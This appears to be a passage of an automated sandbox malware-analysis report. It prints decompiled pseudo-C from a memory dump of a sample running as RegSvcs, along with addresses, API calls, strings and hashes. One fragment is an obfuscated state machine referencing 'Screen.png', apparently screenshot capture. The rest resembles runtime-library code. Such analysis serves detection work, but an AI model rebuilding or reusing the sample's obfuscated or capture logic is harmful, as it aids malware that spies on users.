									_t134 = 0x8cef0c5d;
								}
								_v20 = _t134;
							} else {
								if(_t67 == 0xde28e884) {
									_v24 = _v24 * 0xc720000;
									_v20 = 0xc08bd29;
								}
							}
						} else {
							if(_t67 == 0xd7d4596b) {
								HeapFree(_v52, 0, _v40);
								_v20 = 0x2fda1a92;
							} else {
								if(_t67 == 0xda09c84a) {
									_v20 = 0x719d54d8;
								}
							}
						}
						continue;
					}
					if(_t67 > 0xc58527eb) {
						if(_t67 == 0xc58527ec) {
							_v20 = 0x9f1e3390;
							continue;
						}
						if(_t67 != 0xcc065e9e) {
							continue;
						}
						_t115 = _t115 + 0xffffff5f >> 6;
						E00426ABC(0x2dfc, _t115, 0x34f1);
						_t143 = _t143 + 0xc;
						_t74 = 0x940908b4;
						if(_t115 != 0x1d) {
							_t74 = 0x4ecdc7b4;
						}
						goto L83;
					} else {
						if(_t67 == 0xa5049a8d) {
							_v24 = (_v24 * 0x00000008 - 0x000001c0 >> 0x00000001 & 0x7ffffe00) + 0x14c00;
							_v20 = 0xa8fbb641;
						} else {
							if(_t67 == 0xa8fbb641) {
								E004338A0(_v32, L"Screen.png", 0x16);
								_t143 = _t143 + 0xc;
								_v48 =  *_v28;
								_v20 = 0x91784c25;
							}
						}
						continue;
					}
				}
			}

0x00427fcc
0x00427fd3
0x00427fdc
0x00427fdc
0x00427fe4
0x00000000
0x00000000
0x00427fe6
0x00427feb
0x004280ad
0x004281d3
0x004283ca
0x00428567
0x00427fdc
0x00427fdc
0x00427fe4
0x00000000
0x00000000
0x00000000
0x00427fe4
0x00427fdc
0x0042856d
0x00428577
0x00428577
0x004283dd
0x004283e0
0x00427fdc
0x00427fdc
0x00427fe4
0x00000000
0x00000000
0x00000000
0x00427fe4
0x00000000
0x00427fdc
0x004281de
0x00428476
0x0042847c
0x00428481
0x00428482
0x00428487
0x0042848c
0x0042848f
0x00428497
0x00428499
0x00428499
0x00428516
0x00428516
0x00000000
0x00428516
0x004281e9
0x00000000
0x00000000
0x004281f3
0x004281f7
0x004281fc
0x004281ff
0x0042820a
0x0042820c
0x0042820c
0x00428211
0x00428214
0x00000000
0x00428214
0x004280b8
0x004282e6
0x004284e4
0x004284e7
0x004284f2
0x004284f4
0x004284f4
0x004284f9
0x00000000
0x004284f9
0x004282f1
0x00428303
0x00428308
0x0042830d
0x00428310
0x00428310
0x004280be
0x004280c3
0x00428420
0x00428423
0x004280c9
0x004280ce
0x004280d4
0x004280d7
0x004280da
0x004280df
0x004280e2
0x004280e2
0x004280ce
0x004280c3
0x00000000
0x004280b8
0x00427ff6
0x00428153
0x00428355
0x0042851e
0x00000000
0x0042851e
0x00428360
0x00000000
0x00000000
0x0042836c
0x00428372
0x0042837d
0x00428383
0x00428383
0x00000000
0x0042837d
0x0042815e
0x00428440
0x0042844a
0x00000000
0x0042844a
0x00428169
0x00000000
0x0042816f
0x00428172
0x00428175
0x0042817a
0x00428183
0x00428184
0x0042818b
0x00428191
0x00428191
0x00000000
0x0042818b
0x00428169
0x00428001
0x0042827a
0x004284c0
0x004284c6
0x00428280
0x00428285
0x0042828b
0x0042828b
0x00428285
0x00000000
0x0042827a
0x0042800c
0x004283ec
0x00000000
0x004283ec
0x00428017
0x0042801f
0x00428025
0x0042802a
0x0042802f
0x00428030
0x0042803e
0x00428043
0x004283b9
0x004283b9
0x004283b9
0x00000000
0x0042804b
0x00428050
0x004280f3
0x00428220
0x00000000
0x00000000
0x0042822b
0x004284ae
0x004284b1
0x00428231
0x00428236
0x00428242
0x00428248
0x00428249
0x0042824e
0x00428253
0x00428261
0x00428266
0x00428269
0x00428269
0x00428236
0x00000000
0x0042822b
0x004280fe
0x00428321
0x00428504
0x00428509
0x0042850f
0x00428511
0x00428511
0x00000000
0x0042850f
0x0042832c
0x00428339
0x0042833e
0x00428344
0x00428344
0x00000000
0x0042832c
0x00428109
0x0042842f
0x00428436
0x00000000
0x00428436
0x00428114
0x00000000
0x0042811a
0x0042811d
0x00428122
0x00428133
0x00428134
0x00428137
0x0042813e
0x00428144
0x00428144
0x00000000
0x0042813e
0x00428114
0x0042805b
0x004281a0
0x00428392
0x00428531
0x00428539
0x00428545
0x00428549
0x0042854c
0x00428553
0x00428555
0x00428555
0x0042855a
0x00428398
0x0042839d
0x004283aa
0x004283ad
0x004283ad
0x0042839d
0x004281a6
0x004281ab
0x0042845e
0x00428464
0x004281b1
0x004281b6
0x004281c2
0x004281c2
0x004281b6
0x004281ab
0x00000000
0x004281a0
0x00428066
0x0042829c
0x004284d2
0x00000000
0x004284d2
0x004282a7
0x00000000
0x00000000
0x004282b3
0x004282c1
0x004282c6
0x004282c9
0x004282d1
0x004282d7
0x004282d7
0x00000000
0x0042806c
0x00428071
0x0042840e
0x00428411
0x00428077
0x0042807c
0x0042808c
0x00428091
0x00428099
0x0042809c
0x0042809c
0x0042807c
0x00000000
0x00428071
0x00428066

APIs

GetProcessHeap.KERNEL32 ref: 0042830B
HeapFree.KERNEL32(?,00000000,?), ref: 0042845E

Strings

Screen.png, xrefs: 00428084
<+VV, xrefs: 0042854C
;+VV, xrefs: 004280B3
<+VV, xrefs: 004282E1

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: ;+VV$<+VV$<+VV$Screen.png
API String ID: 3859560861-84251127
Opcode ID: 3683f7d7682a0ba0bd11dac81f52813dfd99df0b0666ccd1b89205ca6273dcaa
Instruction ID: a7b62437023e050c4a55295e6ca797b0e88ec0c8c550c2665707fa41ddfbf7c6
Opcode Fuzzy Hash: 3683f7d7682a0ba0bd11dac81f52813dfd99df0b0666ccd1b89205ca6273dcaa
Instruction Fuzzy Hash: CFC16A70F0D22A9FDF248A48AD8157F76B0AB10310FA4452BE515F7361EB3D89858B5F

Uniqueness

Uniqueness Score: -1.00%

Function 00446704 Relevance: 6.3, APIs: 4, Instructions: 337
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00446704(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed char _t87;
				void* _t93;
				intOrPtr _t94;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t111;
				void* _t113;
				signed int _t114;
				void* _t115;
				void* _t118;
				void* _t120;
				void* _t122;
				signed int* _t124;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int* _t140;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				void* _t161;
				unsigned int _t162;
				intOrPtr _t171;
				signed int _t173;
				signed int* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				intOrPtr _t189;
				void* _t190;

				_t186 = _a24;
				if(_t186 < 0) {
					_t186 = 0;
				}
				_t183 = _a8;
				_t3 = _t186 + 0xb; // 0xb
				 *_t183 = 0;
				if(_a12 > _t3) {
					_t140 = _a4;
					_t147 = _t140[1];
					_t173 =  *_t140;
					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if(__eflags != 0) {
						__eflags = _t147;
						if(__eflags > 0) {
							L13:
							_t20 = _t183 + 1; // 0x2
							_t174 = _t20;
							_t87 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t87;
							_v16 = _t174;
							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
							__eflags = _t147 & 0x7ff00000;
							_t93 = 0x30;
							if((_t147 & 0x7ff00000) != 0) {
								 *_t183 = 0x31;
								L18:
								_t149 = 0;
								__eflags = 0;
								L19:
								_t28 =  &(_t174[0]); // 0x2
								_t184 = _t28;
								__eflags = _t186;
								if(_t186 != 0) {
									_t94 = _a40;
									__eflags =  *((char*)(_t94 + 0x14));
									if(__eflags == 0) {
										E00434D60(_t94, __eflags);
										_t94 = _a40;
										_t174 = _v16;
									}
									_t149 = 0;
									__eflags = 0;
									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
								} else {
									_t98 = _t149;
								}
								 *_t174 = _t98;
								_t100 = _t140[1] & 0x000fffff;
								__eflags = _t100;
								_v40 = _t100;
								if(_t100 > 0) {
									L26:
									_t175 = _t149;
									_t150 = 0xf0000;
									_t101 = 0x30;
									_v12 = _t101;
									_v24 = _t149;
									_v28 = 0xf0000;
									while(1) {
										_v32 = _v12 & 0x0000ffff;
										_t104 = _t184;
										_v36 = _t184;
										_v40 = _t186;
										__eflags = _t186;
										if(__eflags <= 0) {
											break;
										}
										_t127 = E0044DF60( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
										_t161 = 0x30;
										_t129 = _t127 + _t161 & 0x0000ffff;
										__eflags = _t129 - 0x39;
										if(_t129 > 0x39) {
											_t129 = _t129 + _v48;
											__eflags = _t129;
										}
										_t162 = _v28;
										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
										 *_t184 = _t129;
										_t184 = _t184 + 1;
										_t150 = _t162 >> 4;
										_t131 = _v12 - 4;
										_t186 = _t186 - 1;
										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
										_v28 = _t162 >> 4;
										_v12 = _t131;
										__eflags = _t131;
										if(_t131 >= 0) {
											continue;
										} else {
											goto L43;
										}
									}
									_t186 = _v40;
									_t184 = _t104;
									_t105 = E00446671(__eflags, _t140, _t175, _t150, _v32, _a36);
									_t190 = _t190 + 0x14;
									__eflags = _t105;
									if(_t105 == 0) {
										goto L43;
									}
									_t184 = _v36;
									_t146 = 0x30;
									_t124 = _t184 - 1;
									while(1) {
										_t156 =  *_t124;
										__eflags = _t156 - 0x66;
										if(_t156 == 0x66) {
											goto L36;
										}
										__eflags = _t156 - 0x46;
										if(_t156 != 0x46) {
											_t140 = _a4;
											__eflags = _t124 - _v16;
											if(_t124 == _v16) {
												_t65 = _t124 - 1;
												 *_t65 =  *(_t124 - 1) + 1;
												__eflags =  *_t65;
											} else {
												__eflags = _t156 - 0x39;
												if(_t156 != 0x39) {
													_t157 = _t156 + 1;
													__eflags = _t157;
												} else {
													_t157 = _v48 + 0x3a;
												}
												 *_t124 = _t157;
											}
											goto L43;
										}
										L36:
										 *_t124 = _t146;
										_t124 = _t124 - 1;
									}
								} else {
									__eflags =  *_t140 - _t149;
									if( *_t140 <= _t149) {
										L43:
										__eflags = _t186;
										if(_t186 > 0) {
											_push(_t186);
											_t122 = 0x30;
											_push(_t122);
											_push(_t184);
											E004343A0(_t184);
											_t184 = _t184 + _t186;
											__eflags = _t184;
										}
										_t106 = _v16;
										__eflags =  *_t106;
										if( *_t106 == 0) {
											_t184 = _t106;
										}
										 *_t184 = (_v5 << 5) + 0x50;
										_t176 = _t140[1];
										_t111 = E0044DF60( *_t140, 0x34, _t176);
										_t141 = 0;
										_t188 = _t176 & 0;
										_t70 = _t184 + 2; // 0x2
										_t177 = _t70;
										_t154 = (_t111 & 0x000007ff) - _v20;
										__eflags = _t154;
										_v48 = _t177;
										asm("sbb esi, ebx");
										if(__eflags < 0) {
											L51:
											_t154 =  ~_t154;
											asm("adc esi, ebx");
											_t188 =  ~_t188;
											0x2b = 0x2d;
											goto L52;
										} else {
											if(__eflags > 0) {
												L50:
												L52:
												 *(_t184 + 1) = 0x2b;
												_t185 = _t177;
												_t113 = 0x30;
												 *_t177 = _t113;
												__eflags = _t188 - _t141;
												if(__eflags < 0) {
													L61:
													_t178 = 0x30;
													L62:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														L66:
														_t155 = _t154 + _t178;
														__eflags = _t155;
														 *_t185 = _t155;
														 *(_t185 + 1) = _t141;
														L67:
														_t114 = 0;
														__eflags = 0;
														L68:
														return _t114;
													}
													if(__eflags > 0) {
														L65:
														_push(_t141);
														_push(_t141);
														_push(0xa);
														_push(_t188);
														_push(_t154);
														_t115 = E0044B9A0();
														_v48 = _t178;
														_t178 = 0x30;
														 *_t185 = _t115 + _t178;
														_t185 = _t185 + 1;
														_t141 = 0;
														__eflags = 0;
														goto L66;
													}
													__eflags = _t154 - 0xa;
													if(_t154 < 0xa) {
														goto L66;
													}
													goto L65;
												}
												if(__eflags > 0) {
													L55:
													_push(_t141);
													_push(_t141);
													_push(0x3e8);
													_push(_t188);
													_push(_t154);
													_t118 = E0044B9A0();
													_t188 = _t141;
													_v40 = _t177;
													_t177 = _v48;
													_t141 = 0;
													_t185 = _t177 + 1;
													 *_t177 = _t118 + 0x30;
													__eflags = _t185 - _t177;
													if(_t185 != _t177) {
														L59:
														_push(_t141);
														_push(_t141);
														_push(0x64);
														_push(_t188);
														_push(_t154);
														_t120 = E0044B9A0();
														_t188 = _t141;
														_v40 = _t177;
														_t141 = 0;
														_t178 = 0x30;
														 *_t185 = _t120 + _t178;
														_t185 = _t185 + 1;
														__eflags = _t185 - _v48;
														if(_t185 != _v48) {
															goto L65;
														}
														goto L62;
													}
													L56:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														goto L61;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t154 - 0x64;
													if(_t154 < 0x64) {
														goto L61;
													}
													goto L59;
												}
												__eflags = _t154 - 0x3e8;
												if(_t154 < 0x3e8) {
													goto L56;
												}
												goto L55;
											}
											__eflags = _t154;
											if(_t154 < 0) {
												goto L51;
											}
											goto L50;
										}
									}
									goto L26;
								}
							}
							 *_t183 = _t93;
							_t149 =  *_t140 | _t140[1] & 0x000fffff;
							__eflags = _t149;
							if(_t149 != 0) {
								_v20 = 0x3fe;
								goto L18;
							}
							_v20 = _t149;
							goto L19;
						}
						if(__eflags < 0) {
							L12:
							 *_t183 = 0x2d;
							_t183 = _t183 + 1;
							__eflags = _t183;
							_t147 = _t140[1];
							goto L13;
						}
						__eflags = _t173;
						if(_t173 >= 0) {
							goto L13;
						}
						goto L12;
					}
					_t114 = E0044652A(_t140, _t147, _t173, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
					__eflags = _t114;
					if(_t114 == 0) {
						_t136 = E0044EC90(_t183, 0x65);
						__eflags = _t136;
						if(_t136 != 0) {
							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							 *((char*)(_t136 + 3)) = 0;
						}
						goto L67;
					}
					 *_t183 = 0;
					goto L68;
				}
				_t171 = _a40;
				_t189 = 0x22;
				 *((char*)(_t171 + 0x1c)) = 1;
				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
				E00445943(_t183, 0, 0, 0, 0, 0, _t171);
				return _t189;
			}

0x0044670f
0x00446715
0x00446717
0x00446717
0x00446719
0x0044671c
0x0044671f
0x00446724
0x00446749
0x0044674c
0x00446751
0x0044675b
0x00446760
0x004467b9
0x004467bb
0x004467ca
0x004467cd
0x004467cd
0x004467d0
0x004467d2
0x004467d9
0x004467eb
0x004467ee
0x004467f3
0x004467f7
0x004467f8
0x00446818
0x0044681b
0x0044681b
0x0044681b
0x0044681d
0x0044681d
0x0044681d
0x00446820
0x00446822
0x00446828
0x0044682b
0x0044682f
0x00446833
0x00446838
0x0044683b
0x0044683b
0x00446841
0x00446841
0x0044684b
0x00446824
0x00446824
0x00446824
0x0044684d
0x00446852
0x00446852
0x00446857
0x0044685a
0x00446864
0x00446866
0x00446868
0x0044686d
0x0044686e
0x00446871
0x00446874
0x00446877
0x0044687d
0x00446880
0x00446882
0x00446885
0x00446888
0x0044688a
0x00000000
0x00000000
0x004468a1
0x004468a8
0x004468ac
0x004468af
0x004468b2
0x004468b4
0x004468b4
0x004468b4
0x004468ba
0x004468bd
0x004468c1
0x004468c3
0x004468c7
0x004468ca
0x004468cd
0x004468ce
0x004468d1
0x004468d4
0x004468d7
0x004468da
0x00000000
0x004468dc
0x00000000
0x004468dc
0x004468da
0x004468e1
0x004468e4
0x004468ec
0x004468f1
0x004468f4
0x004468f6
0x00000000
0x00000000
0x004468f8
0x004468fd
0x004468fe
0x00446901
0x00446901
0x00446903
0x00446906
0x00000000
0x00000000
0x00446908
0x0044690b
0x00446912
0x00446915
0x00446918
0x0044692d
0x0044692d
0x0044692d
0x0044691a
0x0044691a
0x0044691d
0x00446927
0x00446927
0x0044691f
0x00446922
0x00446922
0x00446929
0x00446929
0x00000000
0x00446918
0x0044690d
0x0044690d
0x0044690f
0x0044690f
0x0044685c
0x0044685c
0x0044685e
0x00446930
0x00446930
0x00446932
0x00446934
0x00446937
0x00446938
0x00446939
0x0044693a
0x00446942
0x00446942
0x00446942
0x00446944
0x00446947
0x0044694a
0x0044694c
0x0044694c
0x00446958
0x0044695c
0x0044695f
0x00446964
0x00446970
0x00446972
0x00446972
0x00446975
0x00446975
0x00446978
0x0044697b
0x0044697d
0x00446989
0x00446989
0x0044698d
0x0044698f
0x00446991
0x00000000
0x0044697f
0x0044697f
0x00446985
0x00446992
0x00446992
0x00446995
0x00446999
0x0044699a
0x0044699c
0x0044699e
0x004469fa
0x004469fc
0x004469fd
0x004469fd
0x004469ff
0x00446a22
0x00446a22
0x00446a22
0x00446a24
0x00446a26
0x00446a29
0x00446a29
0x00446a29
0x00446a2b
0x00000000
0x00446a2b
0x00446a01
0x00446a08
0x00446a08
0x00446a09
0x00446a0a
0x00446a0c
0x00446a0d
0x00446a0e
0x00446a17
0x00446a1a
0x00446a1d
0x00446a1f
0x00446a20
0x00446a20
0x00000000
0x00446a20
0x00446a03
0x00446a06
0x00000000
0x00000000
0x00000000
0x00446a06
0x004469a5
0x004469ab
0x004469ab
0x004469ac
0x004469ad
0x004469ae
0x004469af
0x004469b0
0x004469b5
0x004469b9
0x004469be
0x004469c1
0x004469c3
0x004469c6
0x004469c8
0x004469ca
0x004469d7
0x004469d7
0x004469d8
0x004469d9
0x004469db
0x004469dc
0x004469dd
0x004469e2
0x004469e8
0x004469eb
0x004469ed
0x004469f0
0x004469f2
0x004469f3
0x004469f6
0x00000000
0x00000000
0x00000000
0x004469f8
0x004469cc
0x004469cc
0x004469ce
0x00000000
0x00000000
0x004469d0
0x00000000
0x00000000
0x004469d2
0x004469d5
0x00000000
0x00000000
0x00000000
0x004469d5
0x004469a7
0x004469a9
0x00000000
0x00000000
0x00000000
0x004469a9
0x00446981
0x00446983
0x00000000
0x00000000
0x00000000
0x00446983
0x0044697d
0x00000000
0x0044685e
0x0044685a
0x004467fa
0x00446806
0x00446806
0x00446808
0x0044680f
0x00000000
0x0044680f
0x0044680a
0x00000000
0x0044680a
0x004467bd
0x004467c3
0x004467c3
0x004467c6
0x004467c6
0x004467c7
0x00000000
0x004467c7
0x004467bf
0x004467c1
0x00000000
0x00000000
0x00000000
0x004467c1
0x0044677a
0x00446782
0x00446784
0x00446791
0x00446798
0x0044679a
0x004467ac
0x004467ae
0x004467ae
0x00000000
0x0044679a
0x00446786
0x00000000
0x00446786
0x00446726
0x0044672b
0x00446732
0x00446736
0x00446739
0x00000000

APIs

_strrchr.LIBCMT ref: 00446791

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d6116b9372d108ed4aa9540045f5b1f0c03e2e249f8951ec8f338f29e86b47eb
Instruction ID: 43eda5e9c9be067f7e34110e7d2a20d1ba841dc7fa9563a0a54f343024314297
Opcode Fuzzy Hash: d6116b9372d108ed4aa9540045f5b1f0c03e2e249f8951ec8f338f29e86b47eb
Instruction Fuzzy Hash: 3AB16C71D002459FFB158F68C8817EEBBA5EF5B314F16816BE805AB341D2789D01CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0044947C Relevance: 6.1, APIs: 4, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0044947C(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0x460120; // 0x5959051
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E004495F2( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a) {
					L8:
					_t60 =  &_v601;
					_t32 = E004495F2(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E004493C8(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E00451660(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E00449616);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_t8 =  &(_t68[1]); // 0x2
					if(_t65 == _t8) {
						goto L8;
					} else {
						_push(_t60);
						_t59 = 0;
						L7:
						_t45 = E004493C8(_t60, _t68, _t59, _t59);
					}
				}
				L21:
				return E00431C58(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

0x00449487
0x0044948e
0x00449491
0x00449494
0x0044949a
0x0044949d
0x004494a5
0x004494a7
0x004494ba
0x004494bf
0x00000000
0x00000000
0x00000000
0x004494bf
0x004494c1
0x004494c1
0x004494c7
0x004494cd
0x004494e9
0x004494ea
0x004494f0
0x004494fc
0x004494ff
0x00449501
0x00449508
0x0044951d
0x00449522
0x0044952c
0x0044953c
0x00449542
0x00449543
0x0044954a
0x00449569
0x00449578
0x0044957d
0x00449580
0x00449588
0x004495d7
0x004495dd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044958a
0x00449592
0x0044959c
0x0044959c
0x004495a2
0x004495a6
0x004495ac
0x004495b1
0x004495cc
0x004495d1
0x004495b4
0x004495ba
0x00449524
0x00449524
0x00000000
0x00449524
0x004494cf
0x004494cf
0x004494d4
0x00000000
0x004494d6
0x004494d6
0x004494d7
0x004494d9
0x004494dc
0x004494e1
0x004494d4
0x004495e3
0x004495f1

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00449517
FindNextFileW.KERNEL32(00000000,?), ref: 00449592
FindClose.KERNEL32(00000000), ref: 004495B4
FindClose.KERNEL32(00000000), ref: 004495D7

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 6c7e6278af1bca273b9182ab5b2287478fe6c7ded23bf50bb7d9a33058d3150e
Instruction ID: b6cf8e5375b75a69548bfda51b77919ab8381a8303ef61fa6a884afc6d251abc
Opcode Fuzzy Hash: 6c7e6278af1bca273b9182ab5b2287478fe6c7ded23bf50bb7d9a33058d3150e
Instruction Fuzzy Hash: 9D41E672900229AFEF21DFA5DC89EBBB379EF84305F144196E405D3280E7389E85DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00431855 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00431855(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E004317C6(_t34);
				 *_t60 = 0x2cc;
				_v632 = E004343A0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E004343A0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E004317C6(_t49);
				}
				return _t49;
			}

0x00431855
0x00431855
0x00431855
0x00431869
0x0043186b
0x0043186e
0x0043186e
0x00431872
0x00431877
0x0043188f
0x00431895
0x0043189b
0x004318a1
0x004318a7
0x004318ad
0x004318b3
0x004318ba
0x004318c1
0x004318c8
0x004318cf
0x004318d6
0x004318dd
0x004318de
0x004318e7
0x004318ed
0x004318f0
0x004318f6
0x00431905
0x00431911
0x0043191c
0x00431923
0x0043192a
0x00431935
0x0043193d
0x00431946
0x00431948
0x0043194b
0x0043194d
0x00431957
0x0043195f
0x00431965
0x00000000
0x0043196c
0x0043196f

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00431861
IsDebuggerPresent.KERNEL32 ref: 0043192D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043194D
UnhandledExceptionFilter.KERNEL32(?), ref: 00431957

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: a3cd71997f0feccf8d68a9f131dd2376b33e9d9577c8177edc055402f8938ffc
Instruction ID: f11010cda9307984fc7de4375b9e2127946f073ca573d710344f6331f23638ad
Opcode Fuzzy Hash: a3cd71997f0feccf8d68a9f131dd2376b33e9d9577c8177edc055402f8938ffc
Instruction Fuzzy Hash: 4A312B75D413189BDB20DF65D9897CDBBF8AF18304F1040AAE40DAB250EB759A84CF49

Uniqueness

Uniqueness Score: -1.00%

Function 004457FB Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E004457FB(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
